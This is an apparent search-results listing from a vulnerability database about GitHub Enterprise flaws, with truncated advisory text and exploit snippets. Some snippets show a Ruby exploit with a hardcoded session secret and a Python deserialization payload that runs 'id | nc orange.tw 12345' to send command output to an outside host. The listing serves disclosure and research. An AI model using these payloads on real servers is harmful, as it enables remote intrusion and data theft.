930 matches found
GitHub Enterprise Remote Code Execution Vulnerability
GitHub Enterprise is the enterprise version of the code hosting platform launched by GitHub, which includes all the main features of Github, including commit history, code browsing, comparison view, push requests, issue tracking, Wiki, Gist shared snippets, team management, and more. A remote cod...
GitHub Enterprise 2.8.x Remote Code Execution
!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...
GitHub Enterprise 2.8.7 - Remote Code Execution
GitHub Enterprise 2.8.7 - Remote Code Execution !/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07...
GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution
GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution !/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / '...
GitHub Enterprise < 2.8.7 - Remote Code Execution
!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...
GitHub Enterprise SQL injection vulnerability
作者:Orange 前言 GitHub Enterprise 是一款 GitHub.com 所出品,可將整個 GitHub 服務架設在自身企業內網中的應用軟體。 有興趣的話你可以從 enterprise.github.com 下載到多種格式的映像檔並從網頁上取得 45 天的試用授權! 安裝完成後,你應該會看到如下的畫面: 好!現在我們有整個 GitHub 的環境了,而且是在 VM 裡面,這代表幾乎有完整的控制權可以對他做更進一步的研究,分析環境、程式碼以及架構等等... 環境 身為一個駭客,再進行入侵前的第一件事當然是 Port Scanning! 透過 Nmap 掃描後發現 VM 上一...
Critical Git Client vulnerability Allows Malicious Remote Code Execution
Developers running the open source Git code-repository software and tools, like GitHub, on Mac OS X and Windows computers are highly being recommended to install a security update that patches a major security vulnerability in Git clients that leverages an attacker to hijack end-user computers. T...
Security feature bypass
GitHub Enterprise before 20120304 does not properly restrict the use of a hash to provide values for a model's attributes, which allows remote attackers to set the publickeyuserid value via a modified URL for the public-key update form, related to a "mass assignment" vulnerability...
PT-2012-3769 · Github · Github Enterprise
Name of the Vulnerable Software and Affected Versions: GitHub Enterprise versions prior to 20120304 Description: The issue allows remote attackers to set the public keyuser id value via a modified URL for the public-key update form, related to a "mass assignment" vulnerability. This occurs becaus...